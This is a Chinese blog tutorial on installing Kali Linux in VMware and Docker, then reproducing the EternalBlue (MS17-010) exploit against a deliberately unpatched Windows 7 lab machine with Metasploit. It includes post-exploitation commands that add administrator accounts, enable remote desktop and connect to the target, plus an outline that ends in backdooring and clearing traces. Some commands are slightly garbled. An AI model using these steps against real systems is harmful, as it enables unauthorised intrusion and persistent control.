zoukankan      html  css  js  c++  java

  • docker kali安装及复现永恒之蓝漏洞

    虚拟机安装kali教程

    下载地址:

    https://www.kali.org/downloads/

    选择版本

    ![image-20190823155008224](/Users/huan/Library/Application Support/typora-user-images/image-20190823155008224.png)

    打开VMware Fusion,点击如图中的+,选择新建

    ![image-20190823154416670](/Users/huan/Library/Application Support/typora-user-images/image-20190823154416670.png)

    选择安装方法,点击继续

    ![image-20190823154623088](/Users/huan/Library/Application Support/typora-user-images/image-20190823154623088.png)

    点击使用其他光盘或镜像

    ![image-20190823154656552](/Users/huan/Library/Application Support/typora-user-images/image-20190823154656552.png)

    选择已经下载好的镜像

    ![image-20190823154826441](/Users/huan/Library/Application Support/typora-user-images/image-20190823154826441.png)

    选择操作系统

    ![image-20190823155230976](/Users/huan/Library/Application Support/typora-user-images/image-20190823155230976.png)

    固件类型选择传统BIOS

    ![image-20190823155256440](/Users/huan/Library/Application Support/typora-user-images/image-20190823155256440.png)

    给系统配置硬件,选择自定设置

    ![image-20190823155442317](/Users/huan/Library/Application Support/typora-user-images/image-20190823155442317.png)

    点击完成,进入配置页面

    ![image-20190823155534551](/Users/huan/Library/Application Support/typora-user-images/image-20190823155534551.png)

    选择处理器和内存

    ![image-20190823155608826](/Users/huan/Library/Application Support/typora-user-images/image-20190823155608826.png)

    设置好之后关闭页面并启动,选择graphical install(图形界面安装)

    img

    选择语言,国家等

    ![image-20190823160524932](/Users/huan/Library/Application Support/typora-user-images/image-20190823160524932.png)

    配置域名

    ![image-20190823160630369](/Users/huan/Library/Application Support/typora-user-images/image-20190823160630369.png)

    配置密码

    ![image-20190823160709339](/Users/huan/Library/Application Support/typora-user-images/image-20190823160709339.png)

    磁盘分区

    ![image-20190823160814662](/Users/huan/Library/Application Support/typora-user-images/image-20190823160814662.png)

    ![image-20190823160837645](/Users/huan/Library/Application Support/typora-user-images/image-20190823160837645.png)

    ![image-20190823160912834](/Users/huan/Library/Application Support/typora-user-images/image-20190823160912834.png)

    ![image-20190823160933557](/Users/huan/Library/Application Support/typora-user-images/image-20190823160933557.png)

    等。。。

    ![image-20190823161227325](/Users/huan/Library/Application Support/typora-user-images/image-20190823161227325.png)

    ![image-20190823161805462](/Users/huan/Library/Application Support/typora-user-images/image-20190823161805462.png)

    ![image-20190823161822175](/Users/huan/Library/Application Support/typora-user-images/image-20190823161822175.png)

    ![image-20190823161955944](/Users/huan/Library/Application Support/typora-user-images/image-20190823161955944.png)

    ![image-20190823162046731](/Users/huan/Library/Application Support/typora-user-images/image-20190823162046731.png)

    经历了这么多前戏,马上进入主题,有没有很兴奋

    ![image-20190823162148328](/Users/huan/Library/Application Support/typora-user-images/image-20190823162148328.png)

    安装完毕

    ![image-20190823162319597](/Users/huan/Library/Application Support/typora-user-images/image-20190823162319597.png)

    安装docker

    yum install docker -y
systemctl enable docker
systemctl start docker

    第一个是kali的官方镜像,所以我安装的是第一个镜像

    # 查找kali版本
docker search kali

# 获取kali镜像
docker pull kalilinux/kali-linux-docker

    运行kali镜像

    docker run -it -d --name=kali kalilinux/kali-linux-docker /bin/bash

    进入容器

    docker exec -it kali /bin/bash

    更新

    apt-get update && apt-cache search kali-linux

    安装kali

    apt-get install kali-linux-full -y

    其他相关命令

    apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

    命令讲解:
    apt-get clean //清除缓存索引
    apt-get update //更新索引文件
    apt-get upgrade //更新实际的软件包文件
    apt-get dist-upgrade //根据依赖关系更新

    1. 建立一个组织及域名

    2. 查找该组织下的所有IT资产

    3. 分析IT资产是否存在可利用的方式

    4. 如果有可利用的漏洞,准备漏洞利用脚本

    5. 控制服务器并设置后门

    6. 清除痕迹并打补丁

    准备工作

    卸载Windows补丁

打开控制面板--系统和安全--Windows update--查看已安装的更新

卸载以kb4和4以上开头的补丁,因为漏洞一旦被发现和公开,官网会通过打补丁的方式去修复漏洞

为了方便演示就把所有的补丁卸载掉

    开始渗透

    使用永恒之蓝做演示

    img

    # 搜索可利用的漏洞模块
search ms17-010

# 使用模块
use xxxx

# 查看攻击载荷
show payloads

# 查看影响的系统版本
show targets

# 选择攻击载荷
use payload xxxx

# 查看需要的参数
show options

# yes为必填
set xxx xxxxxx
set payload windows/x64/powershell_bind_tcp

# 实施攻击
exploit

    攻击载荷(payload)

    是成功执行漏洞攻击之后被安装在目标系统中的附加软件或功能。

    目标windows的常用payload样例:

    payload名称 功能描述

    • Windows/adduser:在目标计算机上的本地管理员组创建新用户。

    • Windows/exec: 在目标计算机上执行Windows二进制文件(.exe)。

    • Windows/shell_bind_tcp: 是适用于Windows操作系统平台,能够将Shell控制会话绑定在指定TCP端口上的攻击载荷。

    • bind_tcp:正向连接 (目标监听) ,是攻击者主动连接服务器得到一个SHELL

    • reverse_tcp:反向连接 (本机监听) ,是服务器来连接攻击者,返回一个SHELL

      注:reverse_tcp 就是攻击者开启端口等待远程目标连接,bind_tcp 就是远程目标开启一个端口,等待攻击者连接 。

    创建新用户Dragon

    netuser Dragon 123456 /add

    将用户Dragon添加至管理员组

    netlocalgroup administrators Dragon /add

    创建用户名密码 blue/blue
    net user blue blue /add
    将用户blue添加入管理组
    net localgroup administrators blue /add
    开启远程桌面功能
    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Kali远程桌面连接Win7
    rdesktop 172.16.70.199:3389
  • 相关阅读:
    html控件使用
    托盤
    托盘的实现
    ws2s函数
    网络验证
    右上角X灰化
    如何模拟一个http请求并把response的内容保存下载下来,导出到excel中(结尾福利)
    排序的几种算法(一):冒泡排序
    python中的break eturnpasscontinue用法
    python中socket模块详解
  • 原文地址:https://www.cnblogs.com/liuhuan086/p/14716514.html
Copyright © 2011-2022 走看看